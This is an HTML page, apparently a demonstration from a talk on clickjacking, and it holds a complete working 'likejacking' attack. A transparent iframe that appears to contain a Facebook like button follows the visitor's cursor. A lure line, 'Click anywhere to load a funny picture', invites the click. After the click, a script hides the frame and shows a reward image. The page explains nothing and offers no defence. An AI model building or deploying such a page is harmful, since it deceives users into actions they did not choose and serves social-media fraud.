<html>
	<head>
		<style> 

			html {
				width: 100%;
				height: 100%;
			}

			body{
				cursor: hand;
				margin: 0; 
				padding: 0; 
			}

			#fblike {
				border: 0px;
				left: -14px;
				top: -12px;
				position: absolute;
				filter: alpha(opacity=0);
				z-index: 1;
				opacity: 0;
				overflow: hidden;
				width: 922px;
				height: 656px;
			}

			#clickme {
				overflow: hidden;
				width: 1px;
				height: 1px;
				position: relative;
			}

			#winning {
				display: none;
			}

			img {
			   position: absolute;
			   top: 50%;
			   left: 50%;
			   width: 500px;
			   height: 500px;
			   margin-top: -250px; /* Half the height */
			   margin-left: -250px; /* Half the width */
			}
		</style>
	</head>
	<body>
		<div id="clickme">
			<iframe id="fblike" name="fblike" src="https://talks.fletchto99.com/clickjacking/fb.html"> </iframe>
		</div>
		<div id="gimmick">
			Click anywhere to load a funny picture :)
		</div>
		<img id="winning" src="1337.jpg"></img>
		<script>
			var d = document;
			var toClick = d.getElementById("clickme");
			var toLike = d.getElementById("fblike");
			var gimmick = d.getElementById("gimmick");
			var winning = d.getElementById("winning");

			var clicked = false;

			if (!d.all) {
				d.captureEvents(Event.MOUSEMOVE);
			}
			
			d.onmousemove = function(e){
				if (!clicked) {
					toClick.style.left = d.all ? event.clientX + d.body.scrollLeft : e.pageX;
					toClick.style.top = d.all ? event.clientY + d.body.scrollTop : e.pageY;
				}
			};

			window.onblur = function() {
				setTimeout(function() {
					clicked = true;
					toClick.style.left = -100;
					toClick.style.top = -100;
				}, 300);
				gimmick.style.display = "none";
				winning.style.display = "block";
			};
			window.focus();
		</script>
	</body>
</html>